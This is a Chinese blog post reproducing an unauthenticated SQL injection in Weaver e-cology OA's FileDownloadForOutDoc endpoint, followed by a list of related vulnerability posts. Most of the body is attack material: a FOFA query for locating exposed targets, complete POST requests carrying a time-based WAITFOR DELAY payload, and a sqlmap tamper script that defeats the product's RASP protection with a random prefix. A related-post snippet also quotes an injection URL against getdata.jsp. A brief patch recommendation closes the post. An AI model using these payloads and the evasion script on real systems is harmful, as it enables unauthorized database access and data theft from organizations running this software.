泛微OA 最新前台未授权sql注入

最新推荐文章于 2024-08-23 17:05:58 发布
最新推荐文章于 2024-08-23 17:05:58 发布
阅读量1.3k 收藏 2
点赞数 1
CC 4.0 BY-SA版权
分类专栏: 漏洞复现 文章标签: sql 数据库 泛微oa
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/jd_cx/article/details/131896072
泛微e-cology协同管理平台存在SQL注入漏洞,影响部分8和9版本,未打10.58.0以上补丁的系统。攻击者可利用FileDownloadForOutDoc功能进行注入攻击。RASP虽能拦截重复请求,但需额外处理。官方已发布补丁,建议用户升级到10.58及以上版本以确保安全。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

漏洞介绍

泛微e-cology是一款由泛微网络科技开发的协同管理平台,支持人力资源、财务、行政等多功能管理和移动办公。

泛微e-cology FileDownloadForOutDoc 未对用户的输入进行有效的过滤,直接将其拼接进了SQL查询语句中,导致系统出现SQL注入漏洞。

影响版本

部分e-cology 8且补丁版本<10.58.0

部分e-cology 9且补丁版本<10.58.0

资产测绘

app=“泛微-协同商务系统”

漏洞复现

1.访问泛微OA业务系统
在这里插入图片描述
2.检测payload

POST /weaver/weaver.file.FileDownloadForOutDoc HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36
Content-Length: 45
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Connection: close

fileid=3+WAITFOR+DELAY+'0:0:5'&isFromOutImg=1

3.由于泛微OA启用了RASP,同一个请求执行两次会被拦截,所以需要在请求包中添加随机参数;下面是RASP的介绍

RASP是Runtime Application Self-Protection(运行时应用自我保护)的缩写,是一种用于保护应用程序免受攻击的安全技术。它是在应用程序运行时进行安全检测和保护的一种方法,可以在应用程序本身内部或与应用程序紧密集成的组件中实现。

POST /weaver/weaver.file.FileDownloadForOutDoc HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36
Content-Length: 45
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Connection: close

fileid={random}+WAITFOR+DELAY+'0:0:5'&isFromOutImg=1

4.加载tamper脚本进行注入

import random
from lib.core.enums import PRIORITY

__priority__ = PRIORITY.HIGH


def tamper(payload, **kwargs):
    res = ""
    ran = random.randint(1,2**20)
    res = str(ran)+payload
    return res

在这里插入图片描述

修复建议

目前官方已发布安全补丁,建议受影响用户尽快将补丁版本升级至10.58及以上。

https://www.weaver.com.cn/cs/securityDownload.asp#

OA e-cology9 存在 sql 注入
nnn2188185的博客
04-29 1666
信公众号搜索:南风漏洞复现文库该文章 南风漏洞复现文库 公众号首发 E-Cology9 协同办公系统是一套基于 JSP 及 SQL Server 数据库OA 系统,包括知识文档管理、人力资源管理、客户关系管理、项目管理、财务管理、工作流程管理、数据中心等打造协同高效的企业管理环境,突破企业人、财、物、信息、流程等各种资源之间的屏障,并将集团各企业、企业各部门、各分支机构、以及企业与外部的供应商、分销商、客户及其他合作伙伴等整合在一个统一的平台上,使企业变成一个电子化的内外部协同工作的组织。
e-cology BlogService SQL注入
最新发布
iSee857的博客
08-23 512
由于e-cology未对用户的输入进行有效的过滤,BlogService中直接将其拼接进了SQL查询语句中,导致系统出现SQL注入漏洞。远程未授权攻击者可利用此漏洞获取敏感信息,进一步利用可能获取目标系统权限等。Fofa:app="-OA(e-cology)"e-cology 9 >= 10.64.1。
【漏洞复现】OA E-Cology Browser SQL注入漏洞
晚风不及你
05-16 946
OA E-Cology browser存在SQL注入漏洞,允许攻击者非法访问和操作数据库,可能导致数据泄露、篡改、删除,甚至控制整个服务器。
OA-SQL注入漏洞
maverickpig的博客
01-23 8978
OA sql注入汇总
e-cology9 SQL注入漏洞复现(QVD-2023-5012)
ZL_1618的博客
03-09 2543
协同管理应用平台e-cology是一套兼具企业信息门户、知识文档管理、工作流程管理、人力资源管理、客户关系管理、项目管理、财务管理、资产管理、供应链管理、数据中心功能的企业大型协同管理平台。e-cology9中存在SQL注入漏洞,未经身份认证的远程攻击者即可利用此漏洞获取数据库敏感信息,进一步利用可能导致目标系统被控。
OA8前台sql注入1
08-08
OA8前台SQL注入漏洞详解】 在网络安全领域,SQL注入是一种常见的攻击手段,它允许攻击者通过构造特定的输入来控制或篡改后台数据库的查询操作。在这个案例中,我们关注的是针对OA8系统的一个前台SQL注入...
OA8前台SQL注入1
08-03
OA8前台SQL注入1】漏洞是一个典型的Web安全问题,涉及到数据库操作与前端用户输入的不当交互。在这个特定的案例中,攻击者能够利用应用程序的编程缺陷,直接向数据库发送恶意SQL命令,从而获取敏感信息或者...
【漏洞复现】OA E-Cology SignatureDownLoad SQL注入漏洞
晚风不及你
05-15 811
OA E-Cology SignatureDownLoad存在SQL注入漏洞,允许攻击者非法访问和操作数据库,可能导致数据泄露、篡改、删除,甚至控制整个服务器。
E-Cology BlogService SQL注入漏洞复现
0xSec
08-23 1328
E-Cology BlogService 接口存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
E-Cology getLabelByModule SQL注入漏洞复现
0xSec
01-18 1508
由于e-cology未对用户的输入进行有效的过滤,直接将其拼接进了SQL查询语句中,导致系统出现SQL注入漏洞。远程未授权攻击者可利用此漏洞获取敏感信息,进一步利用可能获取目标系统权限等。
【1day】e-office OA SQL注入漏洞学习
记录并分享学习安全的知识点..
10-17 640
e-office OA是一种企业级办公自动化(Office Automation)解决方案,由中国的软件(FANWEI)开发和提供。它是一套集成办公、流程管理、协同办公、知识管理等功能于一体的全面办公平台。e-office OA存在SQL注入漏洞,攻击者通过在Web应用程序的输入字段中注入恶意的SQL代码,从而在后台数据库中执行未经授权的操作。
【漏洞复现】E-Cology WorkflowServiceXml SQL注入漏洞
失心少年
07-22 915
E-Cology 是一款协同管理平台,旨在为中大型组织创建全新的高效协同办公环境。包含流程、门户、知识、人事、沟通、客户、项目、财务等 20多个功能模块。该系统WorkflowServiceXml接口处未对用户输入进行有效过滤,直接将其拼接进了SQL语句中,导致SQL注入漏洞,会导致数据泄露。技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。
【漏洞复现】E-Cology9 WorkPlanService 前台SQL注入
今天是几号的博客
07-29 2314
E-Cology9 中的 /services/WorkPlanService 接口存在SQL注入漏洞,攻击者可构造SOAP 请求进行SQL注入,窃取或修改数据库敏感信息,进一步利用可能获取目标系统权限。任何因使用本文所提供的信息或工具而导致的损失、后果或不良影响,均由使用者个人承担责任,与本文作者无关。作者不对任何因使用本文信息或工具而产生的损失或后果承担任何责任。使用本文所提供的信息或工具即视为同意本免责声明,并承诺遵守相关法律法规和道德规范。本文所涉及的任何技术、信息或工具,仅供学习和参考之用。
OA8前台SQL注入漏洞
2301_81907423的博客
01-02 778
/irms.web.itms/11/js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select+547653*865674+as+id
E-Cology WorkflowServiceXml SQL注入漏洞复现(QVD-2024-26136)
0xSec
07-12 2523
2024年7月,官方发布了新补丁,修复了一处SQL注入漏洞。经分析,攻击者无需认证即可利用该漏洞,建议受影响的客户尽快修复漏洞。
【0day】e-office OA未授权访问漏洞学习
记录并分享学习安全的知识点..
10-17 883
e-office OA是一种企业级办公自动化(Office Automation)解决方案,由中国的软件(FANWEI)开发和提供。它是一套集成办公、流程管理、协同办公、知识管理等功能于一体的全面办公平台。e-office OA存在未授权访问漏洞,,攻击者可以通过某种方式绕过身份验证机制,直接访问应用程序或系统的敏感资源或功能,从而获取敏感信息或进行恶意操作的一种漏洞。
CNVD-2023-12632 e-cology9 sql注入 附poc
三天不打上房揭瓦的博客
03-18 5716
由于e-cology9中对用户前台输入的数据未做校验,可以通过构造恶意的数据包导致SQL注入漏洞,进一步获取敏感数据。
OA V8 SQL注入漏洞和文件上传漏洞
热门推荐
qq_52469895的博客
04-11 1万+
fofa语句 app="-协同办公OA" SQL注入OA V8中的getdata.jsp文件里,通过gatData方法将数据获取并回显在页面上,而在getData方法中,判断请求里cmd参数是否为空,如果不为空,调用proc方法。其中它存在四个参数,分别为空字符串、cmd参数值、request对象以及serverContext对象,通过对cmd参数值进行判断,当cmd值等于getSelectAllId时,再从请求中获取sql和type两个参数值,并将参数传递进getSelectAllIds
OA8前台SQL注入漏洞解析与利用示例
OA8前台SQL注入漏洞分析 在OA8系统中,存在一个关键的SQL注入漏洞,主要出现在getdata.jsp页面。该漏洞位于URL的cmd参数中,通过不安全的操作将用户提交的请求直接传递给weaver.hrm.common.AjaxManager类的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值